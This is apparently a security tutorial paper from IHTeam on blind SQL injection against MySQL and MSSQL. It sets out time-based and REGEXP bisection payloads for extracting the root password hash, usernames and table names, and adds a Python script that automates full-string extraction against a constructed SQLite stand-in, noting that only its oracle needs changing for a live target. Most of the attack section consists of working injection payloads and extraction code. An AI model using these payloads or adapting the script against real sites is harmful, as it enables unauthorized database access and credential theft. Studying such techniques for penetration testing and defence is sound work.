Blind Sql Injection with Regular Expressions Attack

Powered by IHTeam
Site: www.ihteam.net

Authors: Simone 'R00T_ATI' Quatrini, Marco 'white_sheep' Rondini

Index

Why blind sql injection? .......................................... 3
How can blind sql injection be used? .............................. 3
Testing the vulnerability (MySQL - MSSQL) ......................... 3
Time attack (MySQL) ............................................... 3
Time attack (MSSQL) ............................................... 4
Regexp attack methodology ......................................... 5
Finding a table name with the Regexp attack (MySQL) ............... 5
Finding a table name with the Regexp attack (MSSQL) ............... 6
Exporting a value with the Regexp attack (MySQL) .................. 7
Exporting a value with the Regexp attack (MSSQL) .................. 7
Time considerations ............................................... 8
Bypassing filters ................................................. 9
Real life example ................................................. 9
Conclusions ....................................................... 9

Why blind sql injection?

Blind SQL Injection is used when a web application is vulnerable to an SQL injection, but the results of the injection are not visible to the attacker. The page with the vulnerability may not be one that displays data, but it will display differently depending on the result of a logical statement injected into the legitimate SQL statement called for that page. This type of attack can become time-intensive because a new statement must be crafted for each bit recovered. [Wikipedia]

How can blind sql injection be used?

There are several uses for Blind Sql Injection:

• Testing the vulnerability;
• Finding a table name;
• Exporting a value.

Every technique is based on guessing, because the application gives us only two different answers: TRUE or FALSE. Let me explain better...

Testing the vulnerability (MySQL - MSSQL)

Let's start with an easy example. We have this type of URL:

    site.com/news.php?id=2

It results in this type of query on the database:

    SELECT * FROM news WHERE ID = 2

Now we can try some sql injection techniques, for example blind sql injection:

    site.com/news.php?id=2 and 1=0

The SQL query is now:

    SELECT * FROM news WHERE ID = 2 and 1=0

In this case the query will not return anything (FALSE), because 1 is different from 0. Let's do the litmus test: try to get the TRUE statement by forcing the AND to be TRUE:

    site.com/news.php?id=2 and 0=0

In this case 0 is equal to 0... Got it! We should now see the original news page.
We now know that the page is vulnerable to Blind Sql Injection.

Time attack (MySQL)

When you can't see any kind of result, you must use the time attack. In this example we will try to obtain the password hash of the root user in mysql (this requires that your database user can read mysql.user). The BENCHMARK function is used to keep the server busy for some seconds.

Syntax: BENCHMARK(how many times, thing to do).

When you use it inside an IF statement, you can mount a time attack in MySQL:

    SELECT 1,1 UNION SELECT IF(SUBSTRING(Password,1,1)='a',BENCHMARK(100000,SHA1(1)),0) User,Password FROM mysql.user WHERE User = 'root';
    SELECT 1,1 UNION SELECT IF(SUBSTRING(Password,1,1)='b',BENCHMARK(100000,SHA1(1)),0) User,Password FROM mysql.user WHERE User = 'root';
    SELECT 1,1 UNION SELECT IF(SUBSTRING(Password,1,1)='c',BENCHMARK(100000,SHA1(1)),0) User,Password FROM mysql.user WHERE User = 'root';
    SELECT 1,1 UNION SELECT IF(SUBSTRING(Password,1,1)='d',BENCHMARK(100000,SHA1(1)),0) User,Password FROM mysql.user WHERE User = 'root';

And so on, until you see the BENCHMARK running (a delay of a few more seconds). Then proceed with the 2nd character of the password in the same way. Note that the delay produced by BENCHMARK depends on server load, so calibrate the iteration count before relying on it; MySQL 5.0.12 and later also provide SLEEP(n) for a fixed delay, and from MySQL 5.7 the hash lives in mysql.user.authentication_string rather than in the Password column.

Time attack (MSSQL)

In this example we will try to obtain the first username in the sysusers table. A simple way to generate time delays is to take advantage of one of the biggest database problems, the one that made performance-tuning techniques necessary: heavy queries. All you need to generate a time delay is to access a table that has some rows and build a query that forces the engine to work, in other words a query that ignores everything the performance best practices recommend. (This technique was devised by Chema Alonso, Microsoft Security MVP.) Here the heavy query is an eight-way join of sysusers with itself:

    site.com/news.aspx?id=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers AS sys2, sysusers AS sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 300>(select top 1 ascii(substring(name,1,1)) from sysusers)

Positive result.
The condition is true, and the response is delayed by 14 seconds. We now know that the ASCII value of the first letter of the first username in the sysusers table is lower than 300.

    site.com/news.aspx?id=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers AS sys2, sysusers AS sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 0>(select top 1 ascii(substring(name,1,1)) from sysusers)

Negative result: a one-second response. We now know that the ASCII value of that letter is not lower than 0.

And so on, narrowing the interval with each request:

    [...] >1 and 300>(select top 1 ascii(substring(name,1,1)) from sysusers) → 14 seconds → TRUE
    [...] >1 and 0>(select top 1 ascii(substring(name,1,1)) from sysusers)   → 1 second   → FALSE
    [...] >1 and 150>(select top 1 ascii(substring(name,1,1)) from sysusers) → 14 seconds → TRUE
    [...] >1 and 75>(select top 1 ascii(substring(name,1,1)) from sysusers)  → 1 second   → FALSE
    [...] >1 and 100>(select top 1 ascii(substring(name,1,1)) from sysusers) → 1 second   → FALSE
    [...] >1 and 110>(select top 1 ascii(substring(name,1,1)) from sysusers) → 1 second   → FALSE
    [...] >1 and 120>(select top 1 ascii(substring(name,1,1)) from sysusers) → 14 seconds → TRUE
    [...] >1 and 115>(select top 1 ascii(substring(name,1,1)) from sysusers) → 1 second   → FALSE
    [...] >1 and 118>(select top 1 ascii(substring(name,1,1)) from sysusers) → 1 second   → FALSE
    [...] >1 and 119>(select top 1 ascii(substring(name,1,1)) from sysusers) → 1 second   → FALSE

The value is lower than 120 and not lower than 119, so the result is ASCII(119) = 'w'. Start with the second letter... and so on!

Regexp attack methodology

This is our own creation and it is the fastest way to extract information from a database.
With it you can save a lot of time and bandwidth! The methodology is pretty simple: we define a range of numbers/chars/special chars that will be matched with the REGEXP (MySQL) or LIKE (MSSQL) operators. Let's start with an example, because it is simpler to understand.

Finding a table name with the Regexp attack (MySQL)

In this example we will extract the first matched record of information_schema.tables; you must know the name of the database!

    index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables LIMIT 0,1)

This repeats the blind sql injection test: if we see the correct page, everything is ok.

    index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^[a-z]' LIMIT 0,1)

In this case we know that the first matched record starts with a char between [a -> z]. (MySQL's REGEXP is case-insensitive on non-binary strings, so '^[a-z]' also matches an uppercase initial; use REGEXP BINARY if case matters.) This example shows how to extract the complete name of the record by halving the range at each request:

    index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^[a-n]' LIMIT 0,1)  → True
    index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^[a-g]' LIMIT 0,1)  → False
    index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^[h-n]' LIMIT 0,1)  → True
    index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^[h-l]' LIMIT 0,1)  → False

After these four requests the first character is narrowed down to [m-n].
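The procedure described so far (the litmus test, the ASCII bisection of the MSSQL section and the REGEXP character-class bisection of this section) is put together below as an added example; it is not code from the IHTeam paper. It runs against a constructed in-memory SQLite database that stands in for the MySQL/MSSQL target: the tables 'news' and 'users' and the value 'webmaster' are made up, sqlite_master takes the place of information_schema.tables, unicode()/substr() take the place of MSSQL's ascii()/substring(), and the REGEXP operator is supplied by a registered Python function. Both extractors generalise the paper's single-character walkthroughs to a full string with an end-of-string check, and the oracle counts requests so the cost of the two strategies can be compared.

```python
"""Blind SQL injection extraction against a constructed stand-in target.
Added example (not the IHTeam paper's code): SQLite plays MySQL/MSSQL,
sqlite_master replaces information_schema.tables, REGEXP is a Python function."""
import re
import sqlite3

CHARSET = "abcdefghijklmnopqrstuvwxyz0123456789_"   # assumed table-name alphabet

def _regexp(pattern, value):
    # SQLite evaluates "value REGEXP pattern" as regexp(pattern, value).
    # Case-sensitive here; MySQL's REGEXP is case-insensitive on non-binary
    # columns, so against MySQL use REGEXP BINARY or classes like [a-zA-Z].
    return value is not None and re.search(pattern, value) is not None

def build_target():
    """Constructed vulnerable database: 'news' is what news.php reads,
    'users' holds the value we extract character by character."""
    conn = sqlite3.connect(":memory:")
    conn.create_function("REGEXP", 2, _regexp)
    conn.executescript("""
        CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO news VALUES (1, 'Welcome'), (2, 'Release notes');
        CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT);
        INSERT INTO users VALUES (1, 'webmaster');
    """)
    return conn

def news_page(conn, id_param):
    """news.php?id=...: the parameter is concatenated unquoted into the
    query (the paper's bug); only the article title is rendered."""
    row = conn.execute(f"SELECT title FROM news WHERE id = {id_param}").fetchone()
    return row[0] if row else "No such article"

class BlindOracle:
    """Attacker side: one TRUE/FALSE answer per request (id=2 and (...))."""

    def __init__(self, conn):
        self.conn = conn
        self.baseline = news_page(conn, "2")     # the legitimate page
        self.requests = 0

    def ask(self, condition):
        self.requests += 1
        return news_page(self.conn, f"2 and ({condition})") == self.baseline

def regexp_extract_table(o, charset=CHARSET):
    """REGEXP attack: halve the character class for the next position until
    one char is left; the anchored pattern '^name$' detects the end."""
    def exists(pattern):
        return o.ask("1=(SELECT 1 FROM sqlite_master WHERE type='table' "
                     f"AND name REGEXP '{pattern}' LIMIT 0,1)")
    name = ""
    while not exists(f"^{name}$"):
        if not exists(f"^{name}[{charset}]"):
            raise ValueError(f"character after {name!r} is outside the charset")
        lo, hi = 0, len(charset)                 # candidates are charset[lo:hi]
        while hi - lo > 1:
            mid = (lo + hi) // 2
            if exists(f"^{name}[{charset[lo:mid]}]"):
                hi = mid
            else:
                lo = mid
        name += charset[lo]
    return name

def ascii_extract(o, column, table, lo=32, hi=127):
    """MSSQL-section attack: compare one character's code against a pivot
    ('300>(select ascii(...))') and halve the interval [lo, hi)."""
    value, pos = "", 1
    while o.ask(f"(SELECT length({column}) FROM {table} LIMIT 1) >= {pos}"):
        code = f"(SELECT unicode(substr({column},{pos},1)) FROM {table} LIMIT 1)"
        a, b = lo, hi
        while b - a > 1:
            mid = (a + b) // 2
            if o.ask(f"{mid} > {code}"):
                b = mid                          # code < mid
            else:
                a = mid                          # code >= mid
        if not o.ask(f"{code} = {a}"):           # guard against out-of-range chars
            raise ValueError(f"character {pos} is outside [{lo}, {hi})")
        value += chr(a)
        pos += 1
    return value

def run():
    """Returns (first table name, first username, requests spent)."""
    o = BlindOracle(build_target())
    if not (o.ask("0=0") and not o.ask("1=0")):   # the paper's litmus test
        raise RuntimeError("parameter is not a blind injection point")
    return regexp_extract_table(o), ascii_extract(o, "name", "users"), o.requests

if __name__ == "__main__":
    table, user, n = run()
    print(f"table={table} user={user} requests={n}")
```

Run it as a script to see the extracted values and the request count. Against a live target only BlindOracle.ask changes: compare the HTTP response with the baseline page, or, for the time attacks, compare the response time against a calibrated threshold; the two extractors stay the same.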
